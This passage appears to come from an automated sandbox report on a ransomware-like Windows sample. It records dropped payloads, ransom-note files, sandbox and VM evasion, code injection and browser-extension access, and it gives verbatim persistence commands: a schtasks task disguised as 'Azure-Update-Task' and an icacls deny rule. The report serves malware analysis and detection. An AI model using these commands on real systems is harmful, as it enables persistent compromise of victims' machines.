00000006.00000003.1893524746.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1983051400.00000000032E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: qJKiVKZdFk.exe, 00000006.00000003.1981243781.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1982251689.000000000363B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1971625636.000000000369C000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986448988.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1967687910.0000000003626000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1986375047.0000000003644000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1970280763.000000000368D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W source: qJKiVKZdFk.exe, 00000006.00000003.1485423577.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ta\ source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Cc source: qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y0 source: qJKiVKZdFk.exe, 00000006.00000003.1893229623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820702656.0000000003389000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1820515304.000000000332B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1892773827.000000000330C000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeUnpacked PE file: 2.2.qJKiVKZdFk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 23.2.qJKiVKZdFk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 26.2.qJKiVKZdFk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeUnpacked PE file: 27.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 32.2.qJKiVKZdFk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 33.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 39.2.qJKiVKZdFk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 41.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeUnpacked PE file: 2.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 23.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 26.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeUnpacked PE file: 27.2.build3.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 32.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 33.2.mstsca.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 39.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 41.2.mstsca.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,2_2_00412220
            Source: sqln[1].dll.19.drStatic PE information: section name: .00cfg
            Source: mstsca.exe.27.drStatic PE information: section name: .kic
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_004052A5 push ecx; ret 0_2_004052B8
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_044180AF push ecx; retf 0_2_044180B2
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DE8F05 push ecx; ret 0_2_05DE8F18
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_0445B0AF push ecx; retf 5_2_0445B0B2
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E08F05 push ecx; ret 5_2_05E08F18
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_0448B0AF push ecx; retf 7_2_0448B0B2
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DE8F05 push ecx; ret 7_2_05DE8F18

            Persistence and Installation Behavior

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dllJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe.bgjs (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\$WinREAgent\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\$WinREAgent\Scratch\_README.txtJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\_README.txtJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile created: C:\_README.txt
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile created: C:\Users\user\_README.txt

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_00404F6E EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00404F6E
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_0441671C rdtsc 0_2_0441671C
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeThread delayed: delay time: 700000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeWindow / User API: threadDelayed 5845
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeWindow / User API: threadDelayed 4154
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dllJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe.bgjs (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45714
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exe TID: 7472Thread sleep time: -700000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 3452Thread sleep count: 5845 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 3452Thread sleep time: -1315125s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 3452Thread sleep count: 4154 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 3452Thread sleep time: -934650s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeThread delayed: delay time: 700000Jump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: qJKiVKZdFk.exe, 00000006.00000003.1337442138.00000000097E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: qJKiVKZdFk.exe, 00000006.00000003.1337442138.00000000097E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.0000000000716000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1257098111.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4#v
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeAPI call chain: ExitProcess graph end nodegraph_2-45716
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_0441671C rdtsc 0_2_0441671C
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_0040908D IsDebuggerPresent,0_2_0040908D
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,2_2_00412220
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_044150A3 push dword ptr fs:[00000030h]0_2_044150A3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC0042 push dword ptr fs:[00000030h]0_2_05DC0042
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_044580A3 push dword ptr fs:[00000030h]5_2_044580A3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE0042 push dword ptr fs:[00000030h]5_2_05DE0042
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_044880A3 push dword ptr fs:[00000030h]7_2_044880A3
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC0042 push dword ptr fs:[00000030h]7_2_05DC0042
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_00408558 GetProcessHeap,0_2_00408558
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_00409018 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409018
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DC0110
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeMemory written: C:\Users\user\Desktop\qJKiVKZdFk.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeMemory written: C:\Users\user\Desktop\qJKiVKZdFk.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMemory written: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeMemory written: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMemory written: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeMemory written: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMemory written: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMemory written: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMemory written: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe"Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe" Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --TaskJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
